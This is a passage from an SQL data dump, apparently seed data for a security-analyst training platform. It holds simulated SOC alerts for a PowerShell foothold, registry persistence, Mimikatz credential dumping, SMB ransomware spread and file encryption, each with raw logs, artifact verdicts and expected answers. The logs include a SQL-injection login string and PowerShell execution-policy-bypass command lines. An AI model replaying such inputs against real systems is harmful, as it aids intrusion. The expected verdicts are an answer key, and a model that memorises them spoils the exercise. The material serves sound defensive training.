203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:01Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"url\\\":\\\"http://malicious-ad-network.com/ads\\\",\\\"method\\\":\\\"GET\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://trusted-news-portal.com\\\",\\\"filename\\\":\\\"exploit_kit.js\\\",\\\"hash\\\":\\\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\\\",\\\"username\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.952Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:01Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"url\\\":\\\"http://malicious-ad-network.com/ads\\\",\\\"method\\\":\\\"GET\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://trusted-news-portal.com\\\",\\\"filename\\\":\\\"exploit_kit.js\\\",\\\"hash\\\":\\\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\\\",\\\"username\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.952Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:01Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"url\\\":\\\"http://malicious-ad-network.com/ads\\\",\\\"method\\\":\\\"GET\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64)\\\",\\\"referrer\\\":\\\"http://trusted-news-portal.com\\\",\\\"filename\\\":\\\"exploit_kit.js\\\",\\\"hash\\\":\\\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\\\",\\\"username\\\":\\\"jdoe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(358, 'Malicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'A PowerShell script is executed on the infected system, establishing a foothold within the network and allowing further payloads to be delivered.', 'PowerShell Script', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"event_type\":\"process_creation\",\"computer_name\":\"WIN-0A1B2C3D4E5F\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\Documents\\\\malicious_payload.ps1\",\"file_hash\":\"d4c3b2a1e5f6g7h8i9j0k1l2m3n4o5p6\",\"internal_ip\":\"192.168.1.100\",\"external_ip\":\"203.0.113.45\",\"related_domain\":\"malicious-apt.com\"}', '2026-01-03 00:50:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious script used by APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d4c3b2a1e5f6g7h8i9j0k1l2m3n4o5p6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious PowerShell scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User with administrative privileges.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 
1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(359, 'Persistence Mechanism Established', 'high', 'Windows Event Logs', 'The malware modifies registry keys to ensure it runs on system startup, maintaining persistence even after reboots. The registry modification indicates a sophisticated attempt to establish persistence on the system.', 'Registry Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"EventID\":4657,\"TimeCreated\":\"2023-10-25T14:35:22Z\",\"Computer\":\"victim-pc.localdomain\",\"UserID\":\"S-1-5-21-3456789012-3456789012-3456789012-1001\",\"UserName\":\"john.doe\",\"ProcessID\":4567,\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"RegistryKey\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"RegistryValue\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\maliciousApp.exe -silent\",\"Hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"SourceIP\":\"192.168.1.105\",\"AttackerIP\":\"203.0.113.45\"}', '2026-01-03 00:50:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"IP address known for malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"User account on the compromised 
system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4657,\\\"TimeCreated\\\":\\\"2023-10-25T14:35:22Z\\\",\\\"Computer\\\":\\\"victim-pc.localdomain\\\",\\\"UserID\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"UserName\\\":\\\"john.doe\\\",\\\"ProcessID\\\":4567,\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"RegistryKey\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"RegistryValue\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\maliciousApp.exe -silent\\\",\\\"Hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"SourceIP\\\":\\\"192.168.1.105\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4657,\\\"TimeCreated\\\":\\\"2023-10-25T14:35:22Z\\\",\\\"Computer\\\":\\\"victim-pc.localdomain\\\",\\\"UserID\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"UserName\\\":\\\"john.doe\\\",\\\"ProcessID\\\":4567,\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"RegistryKey\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"RegistryValue\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\maliciousApp.exe -silent\\\",\\\"Hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"SourceIP\\\":\\\"192.168.1.105\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4657,\\\"TimeCreated\\\":\\\"2023-10-25T14:35:22Z\\\",\\\"Computer\\\":\\\"victim-pc.localdomain\\\",\\\"UserID\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"UserName\\\":\\\"john.doe\\\",\\\"ProcessID\\\":4567,\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"RegistryKey\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"RegistryValue\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\maliciousApp.exe -silent\\\",\\\"Hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"SourceIP\\\":\\\"192.168.1.105\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4657,\\\"TimeCreated\\\":\\\"2023-10-25T14:35:22Z\\\",\\\"Computer\\\":\\\"victim-pc.localdomain\\\",\\\"UserID\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"UserName\\\":\\\"john.doe\\\",\\\"ProcessID\\\":4567,\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"RegistryKey\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"RegistryValue\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\maliciousApp.exe -silent\\\",\\\"Hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"SourceIP\\\":\\\"192.168.1.105\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4657,\\\"TimeCreated\\\":\\\"2023-10-25T14:35:22Z\\\",\\\"Computer\\\":\\\"victim-pc.localdomain\\\",\\\"UserID\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"UserName\\\":\\\"john.doe\\\",\\\"ProcessID\\\":4567,\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"RegistryKey\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"RegistryValue\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\maliciousApp.exe -silent\\\",\\\"Hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"SourceIP\\\":\\\"192.168.1.105\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(360, 'Credential Dumping Detected', 'high', 'SIEM Alerts', 'The attackers used Mimikatz to extract credentials from memory, enabling lateral movement across the network to escalate privileges.', 'Mimikatz', 'Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:33Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.25\",\"user\":\"DOMAIN\\\\admin_user\",\"filename\":\"mimikatz.exe\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"process_id\":3216,\"event_type\":\"Credential Dumping\",\"message\":\"Suspicious process mimikatz.exe detected extracting credentials from memory.\"}', '2026-01-03 00:50:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_provider\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Mimikatz executable used for credential extraction.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Mimikatz malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"DOMAIN\\\\admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"internal\",\"details\":\"Privileged domain account used in the 
attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.25\\\",\\\"user\\\":\\\"DOMAIN\\\\\\\\admin_user\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":3216,\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Suspicious process mimikatz.exe detected extracting credentials from memory.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.25\\\",\\\"user\\\":\\\"DOMAIN\\\\\\\\admin_user\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":3216,\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Suspicious process mimikatz.exe detected extracting credentials from memory.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.25\\\",\\\"user\\\":\\\"DOMAIN\\\\\\\\admin_user\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":3216,\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Suspicious process mimikatz.exe detected extracting credentials from memory.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.25\\\",\\\"user\\\":\\\"DOMAIN\\\\\\\\admin_user\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":3216,\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Suspicious process mimikatz.exe detected extracting credentials from memory.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.25\\\",\\\"user\\\":\\\"DOMAIN\\\\\\\\admin_user\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":3216,\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Suspicious process mimikatz.exe detected extracting credentials from memory.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(361, 'Suspicious File Transfer', 'high', 'Network Traffic Analysis', 'Using SMB, the attackers transfer ransomware payloads to other critical systems within the network. This activity is indicative of lateral movement, preparing for a widespread encryption event.', 'SMB Traffic', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"192.168.1.105\",\"external_attacker_ip\":\"203.0.113.25\",\"protocol\":\"SMB\",\"file_transferred\":\"ransomware_payload.exe\",\"file_hash\":\"3b2e2c7d5f234f5c8a9b3a6261d4b7e2\",\"username\":\"compromised_user\",\"action\":\"file_transfer\",\"smb_command\":\"SMB2_WRITE\",\"destination_port\":\"445\"}', '2026-01-03 00:50:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted host for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP address associated with ransomware campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b2e2c7d5f234f5c8a9b3a6261d4b7e2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Virustotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Filename used in the ransomware attack 
campaign.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Account observed in unauthorized file transfer activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(362, 'Data Encryption in Progress', 'critical', 'File Integrity Monitoring', 'The ransomware begins encrypting files on key servers, prompting the attackers to initiate contact with a ransom demand.', 'Ransomware Encryption', 'T1486', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:32Z\",\"event_id\":\"FIM-20231005-001\",\"event_type\":\"file_modification\",\"description\":\"Suspicious file encryption activity detected on server.\",\"affected_host\":\"192.168.1.10\",\"attacker_ip\":\"203.0.113.45\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"admin_user\",\"filename_encrypted\":\"confidential_data.xlsx\",\"ransomware_name\":\"CryptoLockerSim\",\"process_name\":\"encryptor.exe\",\"process_id\":4567}', '2026-01-03 00:50:36', '2026-02-18 11:07:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by ransomware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to CryptoLockerSim ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_system\",\"verdict\":\"suspicious\",\"details\":\"File targeted by ransomware encryption.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 
'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.958Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:32Z\\\",\\\"event_id\\\":\\\"FIM-20231005-001\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"description\\\":\\\"Suspicious file encryption activity detected on server.\\\",\\\"affected_host\\\":\\\"192.168.1.10\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename_encrypted\\\":\\\"confidential_data.xlsx\\\",\\\"ransomware_name\\\":\\\"CryptoLockerSim\\\",\\\"process_name\\\":\\\"encryptor.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:31:18.958Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:32Z\\\",\\\"event_id\\\":\\\"FIM-20231005-001\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"description\\\":\\\"Suspicious file encryption activity detected on server.\\\",\\\"affected_host\\\":\\\"192.168.1.10\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename_encrypted\\\":\\\"confidential_data.xlsx\\\",\\\"ransomware_name\\\":\\\"CryptoLockerSim\\\",\\\"process_name\\\":\\\"encryptor.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:30:18.958Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:32Z\\\",\\\"event_id\\\":\\\"FIM-20231005-001\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"description\\\":\\\"Suspicious file encryption 
activity detected on server.\\\",\\\"affected_host\\\":\\\"192.168.1.10\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename_encrypted\\\":\\\"confidential_data.xlsx\\\",\\\"ransomware_name\\\":\\\"CryptoLockerSim\\\",\\\"process_name\\\":\\\"encryptor.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:29:18.958Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:32Z\\\",\\\"event_id\\\":\\\"FIM-20231005-001\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"description\\\":\\\"Suspicious file encryption activity detected on 